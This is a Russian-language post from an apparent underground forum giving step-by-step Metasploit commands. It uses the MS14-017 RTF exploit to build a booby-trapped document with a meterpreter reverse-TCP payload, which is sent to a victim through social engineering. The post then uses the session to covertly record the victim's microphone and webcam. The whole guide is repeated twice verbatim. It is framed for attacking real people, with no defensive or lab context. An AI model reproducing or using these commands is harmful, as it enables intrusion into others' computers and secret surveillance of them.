![DWH-Форум по обмену приватной информацией [VPN+]](https://dwh.su/styles/prisma/prisma/logotip_2.png)
LeSora
Взлом компьютера с установленной Windows 7/8 посредством уязвимости в веб-приложении Office 2010.
# msfconsole
Находим наш эксплойт:
# exploit/windows/fileformat/ms14_017_rtf
Изучаем информацию и если он вам подходит, используем.
# use exploit/windows/fileformat/ms14_017_rtf
Далее смотрим, какие параметры нужно установить:
# show options
Видим что нужно задать имя файла:
# set FILENAME название.rtf
Теперь нам нужно выбрать полезную нагрузку для нашего эксплойта:
# set PAYLOAD windows/meterpreter/reverse_tcp
Затем установите параметр LHOST для полезной нагрузки:
set LHOST Ваш ip-адресс
Все что нужно собрано, теперь создаем файл:
# exploit
В появившейся строке видим путь до файла: открываем файл, заполняем чем хотим и отправляем жертве любым методом социальной инженерии.
Затем открываем Multi-Handler для управления эксплуатируемой системой:
# use exploit/multi/handler
# set PAYLOAD windows/meterpreter/reverse_tcp
После того, как письмо откроется, вместе с ней откроется и meterpreter-сессия, которой можно будет пользоваться.
meterpreter>
Тут уже дело вашей фантазии, например можно начать запись микрофона:
# run sound_recorder - l /root
Или запись с веб-камеры:
# run webcam -p /root
Веселитесь ;)
# msfconsole
Находим наш эксплойт:
# exploit/windows/fileformat/ms14_017_rtf
Изучаем информацию и если он вам подходит, используем.
# use exploit/windows/fileformat/ms14_017_rtf
Далее смотрим, какие параметры нужно установить:
# show options
Видим что нужно задать имя файла:
# set FILENAME название.rtf
Теперь нам нужно выбрать полезную нагрузку для нашего эксплойта:
# set PAYLOAD windows/meterpreter/reverse_tcp
Затем установите параметр LHOST для полезной нагрузки:
set LHOST Ваш ip-адресс
Все что нужно собрано, теперь создаем файл:
# exploit
В появившейся строке видим путь до файла: открываем файл, заполняем чем хотим и отправляем жертве любым методом социальной инженерии.
Затем открываем Multi-Handler для управления эксплуатируемой системой:
# use exploit/multi/handler
# set PAYLOAD windows/meterpreter/reverse_tcp
После того, как письмо откроется, вместе с ней откроется и meterpreter-сессия, которой можно будет пользоваться.
meterpreter>
Тут уже дело вашей фантазии, например можно начать запись микрофона:
# run sound_recorder - l /root
Или запись с веб-камеры:
# run webcam -p /root
Веселитесь ;)